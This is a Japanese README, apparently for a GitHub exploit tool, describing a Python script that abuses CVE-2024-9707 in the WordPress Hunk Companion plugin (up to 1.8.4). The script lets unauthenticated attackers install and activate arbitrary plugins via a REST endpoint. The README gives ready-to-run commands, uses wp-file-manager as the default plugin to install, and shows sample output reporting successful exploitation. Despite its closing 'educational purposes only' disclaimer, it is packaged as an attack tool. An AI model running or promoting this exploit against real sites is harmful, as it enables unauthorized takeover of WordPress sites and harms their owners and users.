
WordPress用Hunk Companion Plugin: 認可されていないプラグインのインストール/有効化が可能な脆弱性 (バージョン1.8.4まで)
このスクリプトは、WordPress Hunk Companion プラグインの脆弱性(CVE-2024-9707)を悪用して、権限のない攻撃者が /wp-json/hc/v1/themehunk-import REST API エンドポイントを介して任意のプラグインをインストールし、アクティブ化することを可能にします。
| 特徴 | 説明 |
|---|---|
| プラグインバージョン検出 | プラグインバージョンを自動的にチェックします。 |
| 脆弱性チェック | 検出されたバージョンが脆弱かどうか(<= 1.8.4)を判定します。 |
| プラグインのインストール | 脆弱性を悪用して、指定したプラグインをインストールしてアクティブ化します。 |
requests, argparse。pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- スクリプトを実行
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
このスクリプトは教育目的のみです。責任を持って使用し、所有しているシステム、またはテストする明示的な許可があるシステムでのみ使用してください。作者は、このツールの誤用や損害について一切責任を負いません。 著者: Khaled_alenazi | Nxploited